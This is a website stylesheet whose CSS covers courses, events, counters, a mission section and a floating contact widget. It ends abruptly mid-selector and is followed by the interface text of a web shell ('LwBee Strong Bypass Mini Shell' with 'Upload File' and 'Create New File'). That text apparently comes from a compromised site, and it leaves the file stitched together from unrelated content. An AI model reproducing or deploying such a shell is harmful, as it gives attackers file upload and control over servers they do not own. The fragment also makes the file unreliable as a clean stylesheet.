  top: auto;
  bottom: -8%;
  left: -5%;
  right: auto;
  overflow: hidden;
}

.about-grid .about-image-wrap .about-image img {
  max-width: 100%;
  vertical-align: middle;
  display: inline-block;
}

@media (max-width: 769px) {
  .about-grid .about-image-wrap .about-image {
    max-height: 100px;
    max-width: 140px;
  }
}

.counter-wrap {
  border-top: 1px solid #d4d4d4;
  border-bottom: 1px solid #d4d4d4;
  align-items: stretch;
  display: flex;
}

@media (max-width: 769px) {
  .counter-wrap {
    flex-direction: column;
  }
}

.counter-wrap .counter-card {
  grid-column-gap: 20px;
  text-align: center;
  background-color: #fff;
  flex: 1;
  justify-content: center;
  align-items: center;
  padding: 30px 10px;
  display: flex;
  flex-direction: column;
}

.counter-wrap .counter-number {
  color: #1c1f35;
  margin-bottom: 0;
  font-family: Rubik, sans-serif;
  font-size: 50px;
  font-weight: 600;
}

.counter-wrap .counter-text-wrap {
  grid-column-gap: 10px;
  align-items: center;
  padding-top: 0;
  padding-bottom: 1px;
  display: flex;
}

.counter-wrap .counter-block {
  max-height: 17px;
  max-width: 17px;
  min-height: 17px;
  min-width: 17px;
}

.counter-wrap .counter-text {
  margin-bottom: 0;
  font-size: 16px;
  font-weight: 600;
  line-height: 1.3;
}

.counter-wrap .counter-line {
  width: 1px;
  background-color: #d4d4d4;
}

@media (max-width: 769px) {
  .counter-wrap .counter-line {
    width: 100%;
    height: 1px;
  }
}

.courser {
  padding: 100px 0;
  position: relative;
}

.courser-item {
  position: relative;
  display: block;
}

@media (max-width: 769px) {
  .courser-item {
    margin-bottom: 20px;
  }
}

.courser-item img {
  width: 100%;
  height: 100%;
  -o-object-fit: cover;
     object-fit: cover;
}

.courser-item .bg {
  position: absolute;
  left: 0;
  bottom: 0;
  right: 0;
  top: 0;
  background: linear-gradient(0deg, #094223 14.34%, rgba(60, 60, 60, 0) 43.86%);
}

.courser-item span {
  position: absolute;
  left: 50%;
  top: 50%;
  transform: translateX(-50%) translateY(100%);
  display: block;
  padding: 8px 12px;
  color: white;
  opacity: 0;
  background-color: #006b36;
}

.courser-item:hover {
  box-shadow: 0px 30px 18px -8px rgba(0, 0, 0, 0.1);
  transform: scale(1.1, 1.1);
}

.courser-item:hover span {
  transform: translateX(-50%) translateY(-50%);
  opacity: 1;
}

.courser-content {
  position: absolute;
  bottom: 0;
  left: 0;
  padding: 14px 20px;
}

.courser-content h3 {
  font-size: 20px;
  font-weight: 700;
  color: white;
}

.courser-bg {
  left: 0;
  bottom: 0;
  right: 0;
  height: 250px;
  background: linear-gradient(95deg, #086a2d -1.19%, #15a44f 57.78%, #a6ffb4 112.15%);
  z-index: -1;
}

.event {
  padding: 80px 0;
}

.event .slick-slide {
  padding: 10px;
}

.event-item {
  border: solid 1px #eaecf0;
  position: relative;
  margin-bottom: 20px;
}

.event-item img {
  width: 100%;
  max-height: 220px;
}

.event-content {
  padding: 20px;
}

.event-content .d-flex {
  align-items: center;
  gap: 4px;
}

.event-content .d-flex i {
  color: #697077;
  font-size: 12px;
}

.event-content .d-flex span {
  font-size: 14px;
}

.event-content a {
  color: #333;
}

.event-content a h3 {
  font-size: 20px;
  margin-bottom: 0;
  overflow: hidden;
  text-overflow: ellipsis;
  display: -webkit-box;
  -webkit-line-clamp: 2;
  /* number of lines to show */
  -webkit-box-orient: vertical;
  line-height: 1.5em;
  height: 3em;
}

.event-content a:hover {
  color: #006b36;
}

.event-content p {
  margin-bottom: 0;
  font-size: 14px;
  overflow: hidden;
  text-overflow: ellipsis;
  display: -webkit-box;
  -webkit-line-clamp: 2;
  /* number of lines to show */
  -webkit-box-orient: vertical;
  color: #333;
  line-height: 1.5em;
  height: 3em;
}

.sub {
  display: flex;
}

.sub .d-flex {
  align-items: center;
  margin-right: 16px;
  gap: 4px;
}

.sub .d-flex i {
  color: #333;
  margin-right: 5px;
  opacity: 0.5;
}

.status {
  padding: 2px 12px;
  font-size: 12px;
}

.status-coming {
  color: #bc960f;
  background: rgba(188, 150, 15, 0.1);
}

.status-active {
  background: rgba(15, 188, 73, 0.1);
  color: #0fbc49;
}

.status-done {
  background: rgba(119, 119, 119, 0.1);
  color: #494949;
}

.events {
  padding: 50px 0;
}

.live-tag {
  padding: 0 0 16px;
  display: flex;
  flex-direction: row;
  align-items: center;
  flex-wrap: wrap;
  gap: 8px;
}

.live-tag .item {
  display: flex;
  justify-content: center;
  align-items: center;
  padding: 9px 18px;
  gap: 10px;
  background: #eefdf8;
  border-radius: 4px;
  color: #333;
}

.live-tag .item:hover {
  color: #006b36;
}

.live-tag .active {
  background: #006b36;
  color: #fff;
}

.live-tag .active:hover {
  background: #006b36;
  color: #fff;
}

.paging {
  margin: 20px 0;
  justify-content: center;
}

.paging li {
  margin: 0 5px;
}

.paging li a,
.paging li span {
  display: flex;
  align-items: center;
  justify-content: center;
  text-decoration: none;
  height: 38px;
  width: 38px;
  text-align: center;
  border-radius: 5px !important;
  color: #333;
  background-color: #f5f5f5;
  border-radius: 4px;
}

.paging .active a {
  background-color: #006b36;
  border-color: #006b36;
  color: #fff;
}

.bg-world {
  padding: 80px 0;
  background: url(/img/Pattern.png) no-repeat bottom left;
  background-color: #f4f4f4;
  background-size: 100%;
}

@media (max-width: 769px) {
  .bg-world {
    background: url(/img/Pattern.png) no-repeat center center;
  }
}

.client {
  padding: 40px 0;
}

.client-list .slick-track {
  padding: 10px 0;
}

.client-item {
  position: relative;
  padding: 10px 15px;
  border-radius: 8px;
  display: flex;
  align-items: center;
  justify-content: center;
}

.client-item img {
  width: 100%;
}

.client-item:hover {
  background-color: white;
  box-shadow: 0px 4px 16px rgba(0, 0, 0, 0.08);
}

@media (max-width: 769px) {
  .client-item {
    padding: 16px;
    height: 80px;
  }
}

.fields-banner {
  overflow: hidden;
  position: relative;
  height: 330px;
}

.fields-banner img {
  width: 100%;
  height: 100%;
}

.fields-banner .content {
  position: absolute;
  bottom: 0;
  left: 0;
  padding: 16px;
  background: linear-gradient(180deg, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, 0.4) 100%);
}

.fields-banner .content p {
  color: white;
  margin: 0;
}

.fields-banner .slick-list {
  height: 100%;
}

.fields-banner .slick-track {
  max-height: 330px;
  height: 100%;
}

.fields-banner .slick-track div {
  height: 100%;
}

.fields-banner .slides {
  height: 100%;
  max-height: 330px;
}

.fields-banner .hover-img {
  height: 100%;
  max-height: 330px;
}

.fields-banner .hover-img figure {
  max-height: 330px;
  height: 100%;
}

.fields-title {
  color: #006b36;
  font-size: 28px;
  font-weight: 700;
}

@media (max-width: 769px) {
  .fields-title {
    font-size: 24px;
    margin-top: 10px;
  }
}

@media (max-width: 769px) {
  .fields-right {
    margin-bottom: 10px;
  }
}

.widget-search {
  padding: 20px 0 0;
}

.widget-search input {
  padding: 0.75rem 0.5rem !important;
}

.widget-search .input-group-btn {
  background-color: #006b36;
  border-radius: 0 5px 5px 0;
}

.widget-search .input-group-btn .btn {
  height: 100%;
}

.widget-search .input-group-btn i {
  color: #fff;
}

.courses .row:nth-child(2n) {
  flex-direction: row-reverse;
}

.ul-check-2 {
  list-style: none;
}

.train {
  padding: 50px 0;
}

.train .row {
  align-items: center;
}

.train-title {
  font-size: 38px;
  text-transform: uppercase;
  font-weight: 700;
}

@media (max-width: 769px) {
  .train-title {
    font-size: 28px;
  }
}

.train-content {
  height: 100%;
  display: flex;
  flex-direction: column;
  justify-content: center;
}

.train-items {
  display: grid;
  grid-template-columns: repeat(2, 1fr);
  gap: 16px;
}

@media (max-width: 769px) {
  .train-items {
    grid-template-columns: repeat(1, 1fr);
  }
}

.train-item {
  display: flex;
  border: solid 1px #eaecf0;
  padding: 16px;
  overflow: hidden;
}

.train-item * {
  color: #333;
}

@media (max-width: 769px) {
  .train-item {
    font-size: 14px;
    padding: 10px;
  }
}

.train-item .time {
  display: flex;
  flex-direction: column;
  align-items: center;
  padding-right: 16px;
  margin-right: 16px;
  border-right: solid 1px #eaecf0;
}

.train-item .time span {
  font-size: 30px;
  font-weight: 800;
}

.train-item h3 {
  color: #333;
  font-size: 20px;
}

.train-item p {
  margin-bottom: 0;
}

.train-item .btn {
  color: white;
  transform: translateY(100%);
  height: auto;
  opacity: 0;
}

@media (max-width: 769px) {
  .train-item .btn {
    display: none;
  }
}

.train-item:hover {
  border-color: #006b36;
}

.train-item:hover h3 {
  color: #006b36;
}

.train-item:hover .btn {
  transform: translateY(0);
  opacity: 1;
}

.about {
  padding: 80px 0;
  background-color: #eefdf8;
  position: relative;
}

@media (max-width: 769px) {
  .about {
    padding: 40px 0;
  }
}

.about .section-title {
  text-align: left;
}

@media (max-width: 769px) {
  .about .section-title {
    text-align: center;
  }
}

.about .section-title .sub {
  font-size: 20px;
  letter-spacing: 5px;
  font-style: italic;
}

.about-content {
  position: relative;
}

@media (max-width: 769px) {
  .about-content {
    margin-bottom: 50px;
  }
}

.about-content::before {
  position: absolute;
  left: -80px;
  bottom: -40px;
  z-index: -1;
}

@media (max-width: 769px) {
  .about-content::before {
    left: 0px;
  }
}

.about-content p {
  line-height: 26px;
}

@media (max-width: 769px) {
  .about-content p {
    text-align: center;
  }
}

.about-content .gr-btn {
  justify-content: start;
}

@media (max-width: 769px) {
  .about-content .gr-btn {
    display: flex;
    justify-content: center;
  }
}

.about-video {
  position: relative;
}

.about-video img {
  width: 100%;
}

.about-video .play {
  position: absolute;
  top: 50%;
  left: 50% !important;
  transform: translate(-50%, -50%);
  z-index: 1000;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  border: none;
  width: 80px;
  height: 80px;
  display: flex;
  justify-content: center;
  align-items: center;
  background: transparent;
  border-radius: 100rem;
}

.ul-check {
  list-style: none;
  padding: 0;
}

.ul-check li {
  padding: 4px 0;
  display: flex;
  align-items: flex-start;
}

.ul-check li img {
  margin-right: 10px;
}

.mission-content {
  padding: 40px;
}

@media (max-width: 769px) {
  .mission-content {
    padding: 40px 16px;
  }
}

.mission-1 {
  background: linear-gradient(0deg, #1b81ca 0%, #006b36 100%);
  width: 50%;
  padding-left: 11%;
  position: relative;
}

.mission-1::before {
  content: "";
  background-size: cover;
  position: absolute;
  z-index: 3;
  bottom: 50px;
  right: 50px;
  width: 300px;
  height: 300px;
  opacity: 0.1;
}

@media (max-width: 769px) {
  .mission-1 {
    width: 100%;
    padding-left: 16px;
  }
}

.mission-2 {
  background: linear-gradient(180deg, #55c7ea 27.35%, #FFB629 100%);
  padding-right: 11%;
  position: relative;
  width: 50%;
}

.mission-2::before {
  content: "";
  background-size: cover;
  position: absolute;
  top: 50px;
  z-index: 3;
  right: 50px;
  width: 300px;
  height: 300px;
  opacity: 0.1;
}

@media (max-width: 769px) {
  .mission-2 {
    padding-right: 16px;
    width: 100%;
  }
}

.mission-bg {
  display: flex;
  position: relative;
  flex-wrap: wrap;
}

.mission-img {
  position: absolute;
  width: 100%;
  height: 100%;
  left: 0;
  z-index: 1;
}

.mission-title {
  display: flex;
  margin-bottom: 24px;
  position: relative;
  z-index: 4;
}

.mission-title span {
  font-weight: 700;
  font-size: 48px;
  line-height: 56px;
  text-transform: uppercase;
  color: white;
  margin-left: 16px;
}

@media (max-width: 769px) {
  .mission-title img {
    height: 70px;
  }

  .mission-title span {
    font-size: 28px;
    line-height: 36px;
  }
}

.mission h5 {
  color: white;
  text-transform: uppercase;
  font-size: 20px;
  position: relative;
  z-index: 4;
}

.mission p {
  color: white;
  font-weight: 300;
  position: relative;
  z-index: 4;
}

.paradigm {
  padding: 80px 0 120px;
}

@media (max-width: 769px) {
  .paradigm {
    padding: 40px 0;
  }
}

.paradigm-list {
  display: grid;
  grid-template-columns: repeat(4, 1fr);
  gap: 0;
  flex-wrap: wrap;
  align-items: center;
}

@media (max-width: 769px) {
  .paradigm-list {
    grid-template-columns: repeat(2, 1fr);
  }
}

.paradigm-item {
  display: flex;
  flex-direction: column;
  align-items: center;
  padding: 30px 20px;
  gap: 24px;
  color: white;
  height: 100%;
}

.paradigm-item h5 {
  text-align: center;
  text-transform: uppercase;
}

.paradigm-item p {
  text-align: center;
  font-weight: 300;
}

@media (max-width: 769px) {
  .paradigm-item {
    padding: 16px;
    gap: 16px;
  }

  .paradigm-item img {
    width: 55px;
  }
}

.paradigm-main {
  background-color: #006b36;
}

@media (max-width: 769px) {
  .paradigm-main-2 {
    background-color: #FFB629;
  }
}

.paradigm-secondary {
  background-color: #FFB629;
}

@media (max-width: 769px) {
  .paradigm-secondary-2 {
    background-color: #006b36;
  }
}

.contact {
  margin: 50px 0;
  padding: 50px 0;
  background-color: #006b36;
}

.contact .section-title {
  color: white;
}

.contact .section-content {
  color: white;
}

.contact-icon {
  border: 1px solid rgba(255, 255, 255, 0.5);
  background: rgba(255, 255, 255, 0.1);
  border-radius: 100px;
  width: 74px;
  height: 74px;
  display: flex;
  justify-content: center;
  align-items: center;
  margin-bottom: 24px;
  transition: 0.5s;
}

.contact-icon i {
  font-size: 30px;
  color: white;
}

.contact-item {
  display: flex;
  flex-direction: column;
  align-items: center;
  padding: 32px 16px 16px;
  gap: 8px;
  border-radius: 16px;
  height: calc(100% - 16px);
  text-align: center;
  margin-bottom: 16px;
}

.contact-item h5 {
  margin-bottom: 0;
  color: #1c1f35;
}

.contact-item p {
  margin-bottom: 0;
  color: #333;
  height: 72px;
}

.contact-item a,
.contact-item span {
  color: white;
}

@media (max-width: 769px) {
  .contact .form {
    padding: 16px;
  }
}

.contact-page {
  max-width: 1100px;
  margin: 50px auto;
}

.form {
  padding: 24px;
  margin: 60px 24px;
  border-radius: 14px;
}

@media (max-width: 769px) {
  .form {
    margin: 16px 0;
    padding: 0;
  }
}

.form form .form-control {
  margin-bottom: 20px;
  border-radius: 0;
  border: solid 1px;
  border-color: white;
  background-color: #006b36;
  color: white;
  padding: 14px;
}

.form form .form-control::-moz-placeholder {
  color: rgba(255, 255, 255, 0.7607843137);
}

.form form .form-control:-ms-input-placeholder {
  color: rgba(255, 255, 255, 0.7607843137);
}

.form form .form-control::placeholder {
  color: rgba(255, 255, 255, 0.7607843137);
}

.form form .form-control:focus {
  box-shadow: none;
  outline: none;
  border: solid 2px;
  border-color: #ffffff;
}

.contact-home {
  background-color: #006b36;
}

.contact-home .section-title {
  color: white;
  text-align: left;
}

.contact-home .section-content {
  text-align: left;
  color: white;
  margin: 0;
  margin-bottom: 16px;
}

.contact-home .left .contact-item {
  display: flex;
  flex-direction: row;
  align-items: center;
  padding: 10px 0;
  margin-bottom: 0;
}

.contact-home .left .contact-icon {
  width: 44px;
  height: 44px;
  margin-bottom: 0;
}

.contact-home .left .contact-icon i {
  font-size: 16px;
}

.arcontactus-widget.right.arcontactus-message {
  right: 20px;
}

.arcontactus-widget.right.arcontactus-message {
  bottom: 20px;
}

.arcontactus-widget .arcontactus-message-button .pulsation {
  -webkit-animation-duration: 2s;
  animation-duration: 2s;
}

.arcontactus-widget.md .arcontactus-message-button,
.arcontactus-widget.md.arcontactus-message {
  width: 60px;
  height: 60px;
}

.arcontactus-widget {
  opacity: 0;
  transition: 0.2s opacity;
}

.arcontactus-widget * {
  box-sizing: border-box;
}

.arcontactus-widget.left.arcontactus-message {
  left: 20px;
  right: auto;
}

.arcontactus-widget.left .arcontactus-message-button {
  right: auto;
  left: 0;
}

.arcontactus-widget.left .arcontactus-prompt {
  left: 80px;
  right: auto;
  transform-origin: 0 50%;
}

.arcontactus-widget.left .arcontactus-prompt:before {
  border-right: 8px solid #fff;
  border-top: 8px solid transparent;
  border-left: 8px solid transparent;
  border-bottom: 8px solid transparent;
  right: auto;
  left: -15px;
}

.arcontactus-widget.left .messangers-block {
  right: auto;
  left: 0;
  transform-origin: 10% 105%;
}

.arcontactus-widget.left .callback-countdown-block {
  left: 0;
  right: auto;
}

.arcontactus-widget.left .callback-countdown-block::before,
.arcontactus-widget.left .messangers-block::before {
  left: 25px;
  right: auto;
}

.arcontactus-widget.md .callback-countdown-block,
.arcontactus-widget.md .messangers-block {
  bottom: 70px;
}

.arcontactus-widget.md .arcontactus-prompt {
  bottom: 5px;
}

.arcontactus-widget.md.left .callback-countdown-block:before,
.arcontactus-widget.md.left .messangers-block:before {
  left: 21px;
}

.arcontactus-widget.md.left .arcontactus-prompt {
  left: 70px;
}

.arcontactus-widget.md.right .callback-countdown-block:before,
.arcontactus-widget.md.right .messangers-block:before {
  right: 21px;
}

.arcontactus-widget.md.right .arcontactus-prompt {
  right: 70px;
}

.arcontactus-widget.md .arcontactus-message-button .pulsation {
  width: 74px;
  height: 74px;
}

.arcontactus-widget.md .arcontactus-message-button .callback-state,
.arcontactus-widget.md .arcontactus-message-button .icons {
  width: 40px;
  height: 40px;
  margin-top: -20px;
  margin-left: -20px;
}

.arcontactus-widget.sm .arcontactus-message-button,
.arcontactus-widget.sm.arcontactus-message {
  width: 50px;
  height: 50px;
}

.arcontactus-widget.sm .callback-countdown-block,
.arcontactus-widget.sm .messangers-block {
  bottom: 60px;
}

.arcontactus-widget.sm .arcontactus-prompt {
  bottom: 0;
}

.arcontactus-widget.sm.left .callback-countdown-block:before,
.arcontactus-widget.sm.left .messangers-block:before {
  left: 16px;
}

.arcontactus-widget.sm.left .arcontactus-prompt {
  left: 60px;
}

.arcontactus-widget.sm.right .callback-countdown-block:before,
.arcontactus-widget.sm.right .messangers-block:before {
  right: 16px;
}

.arcontactus-widget.sm.right .arcontactus-prompt {
  right: 60px;
}

.arcontactus-widget.sm .arcontactus-message-button .pulsation {
  width: 64px;
  height: 64px;
}

.arcontactus-widget.sm .arcontactus-message-button .icons {
  width: 40px;
  height: 40px;
  margin-top: -20px;
  margin-left: -20px;
}

.arcontactus-widget.sm .arcontactus-message-button .static {
  margin-top: -16px;
}

.arcontactus-widget.sm .arcontactus-message-button .callback-state {
  width: 40px;
  height: 40px;
  margin-top: -20px;
  margin-left: -20px;
}

.arcontactus-widget.active {
  opacity: 1;
}

.arcontactus-widget .icons.hide,
.arcontactus-widget .static.hide {
  opacity: 0;
  transform: scale(0);
}

.arcontactus-widget.arcontactus-message {
  z-index: 10000;
  right: 20px;
  bottom: 20px;
  position: fixed !important;
  height: 70px;
  width: 70px;
}

.arcontactus-widget .arcontactus-message-button {
  width: 70px;
  position: absolute;
  height: 70px;
  right: 0;
  background-color: red;
  border-radius: 50px;
  box-sizing: border-box;
  text-align: center;
  display: flex;
  justify-content: center;
  align-items: center;
  cursor: pointer;
  border: solid 1px #fff;
}

.arcontactus-widget .arcontactus-message-button p {
  font-family: Ubuntu, Arial, sans-serif;
  color: #fff;
  font-weight: 700;
  font-size: 10px;
  line-height: 11px;
  margin: 0;
}

.arcontactus-widget .arcontactus-message-button .pulsation {
  width: 84px;
  height: 84px;
  background-color: red;
  border-radius: 50px;
  position: absolute;
  left: -7px;
  top: -7px;
  z-index: -1;
  transform: scale(0);
  -webkit-animation: arcontactus-pulse 2s infinite;
  animation: arcontactus-pulse 2s infinite;
}

.arcontactus-widget .arcontactus-message-button .icons {
  background-color: #fff;
  width: 44px;
  height: 44px;
  border-radius: 50px;
  position: absolute;
  overflow: hidden;
  top: 50%;
  left: 50%;
  margin-top: -22px;
  margin-left: -22px;
}

.arcontactus-widget .arcontactus-message-button .static {
  position: absolute;
  top: 50%;
  left: 50%;
  margin-top: -19px;
  margin-left: -26px;
  width: 52px;
  height: 52px;
  text-align: center;
}

.arcontactus-widget .arcontactus-message-button .static img {
  display: inline;
}

.arcontactus-widget .arcontactus-message-button .static svg {
  width: 24px;
  height: 24px;
  color: #fff;
}

.arcontactus-widget .arcontactus-message-button.no-text .static {
  margin-top: -12px;
}

.arcontactus-widget .pulsation:nth-of-type(2n) {
  -webkit-animation-delay: 0.5s;
  animation-delay: 0.5s;
}

.arcontactus-widget .pulsation.stop {
  -webkit-animation: none;
  animation: none;
}

.arcontactus-widget .icons-line {
  top: 10px;
  left: 12px;
  display: flex;
  position: absolute;
  -webkit-transition: cubic-bezier(0.13, 1.49, 0.14, -0.4);
  -o-transition: cubic-bezier(0.13, 1.49, 0.14, -0.4);
  -webkit-animation-delay: 0s;
  animation-delay: 0s;
  transform: translateX(30px);
  height: 24px;
  transition: 0.2s all;
}

.arcontactus-widget .icons,
.arcontactus-widget .static {
  transition: 0.2s all;
}

.arcontactus-widget .icons-line.stop {
  -webkit-animation-play-state: paused;
  animation-play-state: paused;
}

.arcontactus-widget .icons-line span {
  display: inline-block;
  width: 24px;
  height: 24px;
  color: red;
}

.arcontactus-widget .icons-line span i,
.arcontactus-widget .icons-line span svg {
  width: 24px;
  height: 24px;
}

.arcontactus-widget .icons-line span i {
  display: block;
  font-size: 24px;
  line-height: 24px;
}

.arcontactus-widget .icons-line img,
.arcontactus-widget .icons-line span {
  margin-right: 40px;
}

.arcontactus-widget .icons.hide .icons-line {
  transform: scale(0);
}

.arcontactus-widget .icons .icon:first-of-type {
  margin-left: 0;
}

.arcontactus-widget .arcontactus-close {
  color: #fff;
}

.arcontactus-widget .arcontactus-close svg {
  transform: rotate(180deg) scale(0);
  transition: ease-in 0.12s all;
  display: block;
}

.arcontactus-widget .arcontactus-close.show-messageners-block svg {
  transform: rotate(0) scale(1);
}

.arcontactus-widget .arcontactus-prompt,
.arcontactus-widget .messangers-block {
  background: center no-repeat #fff;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.6);
  width: 235px;
  position: absolute;
  bottom: 80px;
  right: 0;
  display: flex;
  flex-direction: column;
  align-items: flex-start;
  padding: 14px 0;
  box-sizing: border-box;
  border-radius: 7px;
  transform-origin: 80% 105%;
  transform: scale(0);
  transition: ease-out 0.12s all;
  z-index: 10000;
}

.arcontactus-widget .arcontactus-prompt:before,
.arcontactus-widget .messangers-block:before {
  position: absolute;
  bottom: -7px;
  right: 25px;
  left: auto;
  display: inline-block !important;
  border-right: 8px solid transparent;
  border-top: 8px solid #fff;
  border-left: 8px solid transparent;
  content: "";
}

.arcontactus-widget .arcontactus-prompt.show-messageners-block,
.arcontactus-widget .messangers-block.show-messageners-block {
  transform: scale(1);
}

.arcontactus-widget .arcontactus-prompt {
  color: #787878;
  font-family: Arial, sans-serif;
  font-size: 16px;
  line-height: 18px;
  width: auto;
  bottom: 10px;
  right: 80px;
  white-space: nowrap;
  padding: 18px 20px 14px;
}

.arcontactus-widget .arcontactus-prompt:before {
  border-right: 8px solid transparent;
  border-top: 8px solid transparent;
  border-left: 8px solid #fff;
  border-bottom: 8px solid transparent;
  bottom: 16px;
  right: -15px;
}

.arcontactus-widget .arcontactus-prompt.active {
  transform: scale(1);
}

.arcontactus-widget .arcontactus-prompt .arcontactus-prompt-close {
  position: absolute;
  right: 6px;
  top: 6px;
  cursor: pointer;
  z-index: 100;
  height: 14px;
  width: 14px;
  padding: 2px;
}

.arcontactus-widget .arcontactus-prompt .arcontactus-prompt-close svg {
  height: 10px;
  width: 10px;
  display: block;
}

.arcontactus-widget .arcontactus-prompt .arcontactus-prompt-typing {
  border-radius: 10px;
  display: inline-block;
  left: 3px;
  padding: 0;
  position: relative;
  top: 4px;
  width: 50px;
}

.arcontactus-widget .arcontactus-prompt .arcontactus-prompt-typing > div {
  position: relative;
  float: left;
  border-radius: 50%;
  width: 10px;
  height: 10px;
  background: #ccc;
  margin: 0 2px;
  -webkit-animation: arcontactus-updown 2s infinite;
  animation: arcontactus-updown 2s infinite;
}

.arcontactus-widget .arcontactus-prompt .arcontactus-prompt-typing > div:nth-child(2) {
  -webkit-animation-delay: 0.1s;
          animation-delay: 0.1s;
}

.arcontactus-widget .arcontactus-prompt .arcontactus-prompt-typing > div:nth-child(3) {
  -webkit-animation-delay: 0.2s;
          animation-delay: 0.2s;
}

.arcontactus-widget .messangers-block.sm .messanger {
  padding-left: 50px;
  min-height: 44px;
}

.arcontactus-widget .messangers-block.sm .messanger span {
  height: 32px;
  width: 32px;
  margin-top: -16px;
}

.arcontactus-widget .messangers-block.sm .messanger span svg {
  height: 20px;
  width: 20px;
  margin-top: -10px;
  margin-left: -10px;
}

.arcontactus-widget .messanger {
  display: flex;
  flex-direction: row;
  align-items: center;
  margin: 0;
  cursor: pointer;
  width: 100%;
  padding: 8px 20px 8px 60px;
  position: relative;
  min-height: 54px;
  text-decoration: none;
}

.arcontactus-widget .messanger:hover {
  background-color: #eee;
}

.arcontactus-widget .messanger:before {
  background-repeat: no-repeat;
  background-position: center;
}

.arcontactus-widget .messanger.facebook span {
  background: #0084ff;
}

.arcontactus-widget .messanger.viber span {
  background: #7c529d;
}

.arcontactus-widget .messanger.telegram span {
  background: #2ca5e0;
}

.arcontactus-widget .messanger.skype span {
  background: #31c4ed;
}

.arcontactus-widget .messanger.email span {
  background: #ff8400;
}

.arcontactus-widget .messanger.contact span {
  background: #7eb105;
}

.arcontactus-widget .messanger.call-back span {
  background: #54cd81;
}

.arcontactus-widget .messanger span {
  position: absolute;
  left: 10px;
  top: 50%;
  margin-top: -20px;
  display: block;
  width: 40px;
  height: 40px;
  border-radius: 50%;
  background-color: #0084ff;
  margin-right: 10px;
  color: #fff;
  text-align: center;
  vertical-align: middle;
}

.arcontactus-widget .messanger span i,
.arcontactus-widget .messanger span svg {
  width: 24px;
  height: 24px;
  vertical-align: middle;
  text-align: center;
  display: block;
  position: absolute;
  top: 50%;
  left: 50%;
  margin-top: -12px;
  margin-left: -12px;
}

.arcontactus-widget .messanger span i {
  font-size: 24px;
  line-height: 24px;
}

.arcontactus-widget .messanger p {
  margin: 0;
  font-family: Arial, sans-serif;
  font-size: 14px;
  color: rgba(0, 0, 0, 0.87);
}

@-webkit-keyframes arcontactus-pulse {
  0% {
    transform: scale(0);
    opacity: 1;
  }

  50% {
    opacity: 0.5;
  }

  100% {
    transform: scale(1);
    opacity: 0;
  }
}

@media (max-width: 468px) {
  .arcontactus-widget.opened.arcontactus-message,
  .arcontactus-widget.opened.left.arcontactus-message {
    width: auto;
    right: 20px;
    left: 20px;
  }
}

@keyframes arcontactus-updown {
  0%, 100%, 43% {
    transform: translate(0, 0);
  }

  25%, 35% {
    transform: translate(0, -10px);
  }
}

@-webkit-keyframes arcontactus-updown {
  0%, 100%, 43% {
    transform: translate(0 0);
  }

  25%, 35% {
    transform: translate(-10px 0);
  }
}

@keyframes arcontactus-pulse {
  0% {
    transform: scale(0);
    opacity: 1;
  }

  50% {
    opacity: 0.5;
  }

  100% {
    transform: scale(1);
    opacity: 0;
  }
}

@-webkit-keyframes arcontactus-show-stat {
  0%, 100%, 20%, 85% {
    transform: scale(1);
  }

  21%, 84% {
    transform: scale(0);
  }
}

@keyframes arcontactus-show-stat {
  0%, 100%, 20%, 85% {
    transform: scale(1);
  }

  21%, 84% {
    transform: scale(0);
  }
}

@-webkit-keyframes arcontactus-show-icons {
  0%, 100%, 20%, 85% {
    transform: scale(0);
  }

  21%, 84% {
    transform: scale(1);
  }
}

@keyframes arcontactus-show-icons {
  0%, 100%, 20%, 85% {
    transform: scale(0);
  }

  21%, 84% {
    transform: scale(1);
  }
}

.news-detail img{
  width: 100%;
}
.hover-img figure img

@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File